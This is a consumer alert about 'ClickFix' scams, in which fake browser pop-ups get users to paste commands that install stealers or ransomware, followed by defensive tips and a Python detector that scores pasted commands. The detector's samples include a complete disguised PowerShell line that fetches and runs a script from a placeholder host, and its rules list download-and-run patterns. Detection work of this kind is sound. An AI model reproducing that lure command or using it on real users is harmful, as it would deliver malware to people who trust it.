What You Need to Know

As of mid-April 2026, security researchers have seen a massive spike in “ClickFix” social engineering attacks. Unlike traditional malware that tries to “break in” to your computer, this scam tricks you into doing the work for the hacker. It usually starts with a fake pop-up on a website claiming your browser has a “critical error,” an “expired certificate,” or a “failed CAPTCHA.”

The pop-up provides a “Fix” button that instructs you to copy a string of code and paste it directly into your computer’s terminal or “Run” box. Because you are the one initiating the command, your antivirus software often assumes the action is legitimate. In reality, that code installs “Venom Stealer” or “Qilin” ransomware, which can encrypt your files and steal your saved passwords in under five minutes.

What You Should Do

  • Never copy-paste code: Avoid any website or pop-up that asks you to “copy and paste” commands into your computer’s terminal, PowerShell, or Run dialog to fix a browser issue.

  • Close the tab: If you see a “Critical Error” or “Google Chrome Update” pop-up that prevents you from clicking away, use Task Manager (Ctrl+Shift+Esc) to force-close your browser entirely.

  • Verify the source: Remember that legitimate companies like Google, Microsoft, or Cloudflare will never ask you to manually run scripts or terminal commands to verify your identity.

  • Update your browser: Ensure your browser is set to “Auto-Update” so you have the latest native security patches that block these malicious overlay scripts.

  • Run a scan: If you fear you may have clicked a suspicious link, run a full system scan using professional-grade security software immediately.
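
For readers who look after other people's computers, here is how the "copy and paste this command" pattern described above can be flagged automatically. This is an added example, not part of the original alert: the rule names, patterns, weights and sample commands are all assumptions constructed for illustration.

```python
import re

# Assumed heuristics for text a web page asks you to paste into the Run box
# or a terminal. Names, patterns and weights are illustrative, not a vendor rule set.
RULES = [
    ("script_host", 2, re.compile(
        r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|bash)(\.exe)?\b", re.I)),
    ("hidden_window", 2, re.compile(
        r"(?<![\w-])-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I)),
    ("encoded_command", 2, re.compile(
        r"(?<![\w-])-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("remote_fetch", 2, re.compile(r"https?://", re.I)),
    ("download_and_run", 3, re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod)\b"
        r"|\|\s*(ba)?sh\b", re.I)),
    # Trailing comment dressed up as the "CAPTCHA" or "fix" the pop-up promised.
    ("lure_comment", 3, re.compile(
        r"#.*\b(captcha|verif\w*|robot|human|fix|update)\b", re.I)),
]

def assess(pasted: str) -> dict:
    """Score one pasted command and list which heuristics fired."""
    hits = [(name, weight) for name, weight, rx in RULES if rx.search(pasted)]
    score = sum(weight for _, weight in hits)
    verdict = "likely-clickfix" if score >= 4 else "review" if score >= 2 else "benign"
    return {"score": score, "verdict": verdict, "reasons": [n for n, _ in hits]}

# Constructed samples: example.invalid never resolves, and the encoded blob
# is just base64 of sixteen "A" characters.
SAMPLES = [
    'powershell -w hidden -c "iex (irm https://cdn.example.invalid/fix.txt)" '
    "# I am not a robot: CAPTCHA verification ID 4821",
    "powershell -enc QUFBQUFBQUFBQUFBQUFBQQ==",
    "cmd",
    r"notepad C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = assess(s)
        print(f"{r['verdict']:<16} {r['score']:>2}  {','.join(r['reasons']) or '-'}  <- {s[:60]}")
```

A "benign" result only means none of these few patterns fired; the advice above still applies to any command a web page tells you to paste.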

Think you are being scammed? Call our scam hotline or email us for help:
(801)-724-6211
scamwatch@invisus.com